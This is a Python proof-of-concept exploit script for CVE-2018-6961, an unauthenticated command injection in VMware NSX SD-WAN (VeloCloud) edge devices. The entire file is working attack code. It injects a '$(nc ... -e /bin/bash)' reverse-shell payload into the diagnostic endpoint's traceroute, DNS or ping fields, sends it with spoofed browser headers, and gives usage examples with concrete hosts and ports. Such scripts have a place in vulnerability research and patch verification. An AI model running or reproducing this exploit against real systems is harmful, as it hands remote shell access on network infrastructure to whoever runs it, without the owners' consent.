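#!/usr/bin/python
# CVE-2018-6961
# Vuln: Unauthenticated Command Injection
# Date: 12/september/2018
# Author: b0k@nRb ||
# Credit: Critical Start || https://www.criticalstart.com/2018/06/cve-2018-6961-unauthenticated-command-injection-vulnerability-in-vmware-nsx-sd-wan-by-velocloud/
# Vendor: https://www.vmware.com
# Tested on: 3.1.1
# Patched on: 3.1.2 || https://www.vmware.com/security/advisories/VMSA-2018-0011.html
"""Proof of concept for CVE-2018-6961 (VMware NSX SD-WAN by VeloCloud).

The edge's unauthenticated diagnostic endpoint ``/scripts/ajaxPortal.lua``
passes a user-supplied field (``destination`` / ``name``) into a shell
command.  This script injects a ``$(nc ... -e /bin/bash)`` command
substitution into that field to obtain a reverse shell.

Usage::

    python exploit.py --rhost 177.77.7.7 --interface ge1 --lhost 172.20.10.10 --lport 443 --function traceroute

Start a listener (e.g. ``nc -lvnp 443``) on ``--lhost`` *before* running.
Because the payload is a command substitution, the diagnostic command on the
target waits for ``nc`` to exit, so the HTTP request does not return while
the shell is open; the "200 OK" check below therefore only runs after the
shell session has ended (or the request timed out).

Only use this against systems you are explicitly authorized to test.
"""
from __future__ import print_function

import argparse
import collections
import sys

# Path of the unauthenticated diagnostic handler on the edge.
DIAG_PATH = "/scripts/ajaxPortal.lua"

# Diagnostic tests the handler exposes and the parameters they take.
_TEST_TRACEROUTE = "TRACEROUTE"
_TEST_DNS = "DNS_TEST"
_TEST_PING = "BASIC_PING"

BANNER = r"""
 ____        _     _   _ ____
| __ )  ___ | | __| \ | |  _ \
|  _ \ / _ \| |/ /|  \| | |_) |
| |_) | (_) |   < | |\  |  _ <
|____/ \___/|_|\_\|_| \_|_| \_\
"""


def usage():
    """Print the banner and an invocation example to stdout."""
    print(BANNER)
    print("Usage()")
    print("python exploit.py --rhost --interface --lhost --lport --function")
    print("python exploit.py --rhost 177.77.7.7 --interface ge1 --lhost 172.20.10.10 --lport 443 --function traceroute")
    print("Like the example above")


def build_parser():
    """Return the argparse parser for the command line.

    All flags are optional at the argparse level (as in the original script);
    ``main`` validates them and prints ``usage()`` when something is missing.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--rhost", help="Remote Host")
    parser.add_argument(
        "--interface",
        help="Interface that has Internet Access (Example: ge1, ge1.401, ge2, ge2.2000)",
    )
    parser.add_argument("--lhost", help="Local Host")
    parser.add_argument("--lport", help="Local Port")
    parser.add_argument(
        "--function", help="Function to abuse (example: traceroute, dns, ping)"
    )
    return parser


def build_payload(lhost, lport):
    """Return the shell command substitution injected into the diagnostic field.

    The target executes the field inside a shell command, so ``$(...)`` runs
    ``nc`` with ``/bin/bash`` attached, connecting back to ``lhost:lport``.
    Note that ``nc -e`` requires a netcat build on the target that supports
    ``-e``; this PoC assumes the VeloCloud image ships one.

    Args:
        lhost: listener address (string, used verbatim).
        lport: listener port (string, used verbatim).
    """
    return "$(nc " + lhost + " " + lport + " -e /bin/bash)"


def build_url(rhost):
    """Return the plain-HTTP URL of the diagnostic handler on ``rhost``."""
    return "http://" + rhost + DIAG_PATH


def build_headers(rhost):
    """Return the request headers mimicking the edge's own AJAX portal.

    Kept as an ``OrderedDict`` so the header order on the wire is stable.
    ``culture=en-us`` is the only cookie the portal sets for an anonymous
    user; no session cookie is needed (the endpoint is unauthenticated).
    """
    return collections.OrderedDict(
        [
            ("User-Agent", "Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0"),
            ("Accept", "application/json, text/javascript, */*; q=0.01"),
            ("Accept-Language", "en-US,en;q=0.5"),
            ("Accept-Encoding", "gzip, deflate"),
            ("Referer", "http://" + rhost + "/"),
            ("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"),
            ("X-Requested-With", "XMLHttpRequest"),
            ("Cookie", "culture=en-us"),
            ("Connection", "close"),
        ]
    )


def build_request_body(function, interface, payload):
    """Return the form body for the chosen diagnostic test.

    The payload is appended directly to the host/name field so the injected
    ``$(...)`` ends up inside the shell command the edge builds.  The body is
    sent as-is (not URL-encoded), matching the original PoC; the ``$``, ``(``
    and spaces in the payload have been observed to survive the edge's parsing
    in that form, so do not percent-encode them without re-testing.

    Args:
        function: ``"traceroute"``, ``"dns"`` or anything else (treated as
            ping, as in the original script).
        interface: egress interface for the ``source`` field; unused for DNS.
        payload: value returned by :func:`build_payload`.
    """
    if function == "traceroute":
        return (
            "destination=8.8.8.8" + payload
            + "&source=" + interface
            + "&test=" + _TEST_TRACEROUTE
            + "&requestTimeout=900&auth_token=&_cmd=run_diagnostic"
        )
    if function == "dns":
        return (
            "name=google.com" + payload
            + "&test=" + _TEST_DNS
            + "&requestTimeout=90&auth_token=&_cmd=run_diagnostic"
        )
    # Any other value (including the documented "ping") uses the ping test.
    return (
        "destination=8.8.8.8" + payload
        + "&source=" + interface
        + "&test=" + _TEST_PING
        + "&requestTimeout=90&auth_token=&_cmd=run_diagnostic"
    )


def exploit(rhost, interface, lhost, lport, function, timeout=None):
    """Send the injected diagnostic request to ``rhost``.

    Args:
        rhost: target edge host (no scheme).
        interface: egress interface name (traceroute/ping only).
        lhost, lport: reverse-shell listener address and port.
        function: diagnostic test to abuse, see :func:`build_request_body`.
        timeout: ``requests`` timeout.  ``None`` (default) waits
            indefinitely, which is what you want while the shell is open —
            the request only completes after the injected ``nc`` exits.

    Returns:
        True if the edge eventually answered 200 OK, False otherwise.  A 200
        is a weak signal: it is only seen once the shell has closed, and a
        patched edge may also answer 200 without running the command.
    """
    # Lazy import so the pure helpers above stay usable without requests.
    import requests

    url = build_url(rhost)
    body = build_request_body(function, interface, build_payload(lhost, lport))
    print("Exploiting...................")
    try:
        resp = requests.post(url, headers=build_headers(rhost), data=body, timeout=timeout)
    except requests.exceptions.Timeout:
        # Expected when a timeout is set and the shell is still alive: the
        # diagnostic command blocks on the nc child.  Check your listener.
        print("Request timed out - if your listener got a connection, the shell is live")
        return False
    except requests.exceptions.RequestException as err:
        print("Request failed: " + str(err))
        return False
    if resp.status_code == 200:
        print("Excelent.....Enjoy your shell")
        return True
    print("Better check what you did (HTTP " + str(resp.status_code) + ")")
    return False


def main(argv=None):
    """CLI entry point: validate arguments, then run :func:`exploit`.

    Returns a process exit status (0 on a 200 response, 1 otherwise or when
    arguments are missing).
    """
    parser = build_parser()
    args = parser.parse_args(argv)
    # --interface is only consumed by the traceroute/ping bodies, so it is
    # not required for DNS.  Everything else is mandatory.
    missing = not (args.rhost and args.lhost and args.lport)
    if args.function != "dns" and not args.interface:
        missing = True
    if missing:
        usage()
        return 1
    ok = exploit(args.rhost, args.interface, args.lhost, args.lport, args.function)
    return 0 if ok else 1


if __name__ == "__main__":
    sys.exit(main())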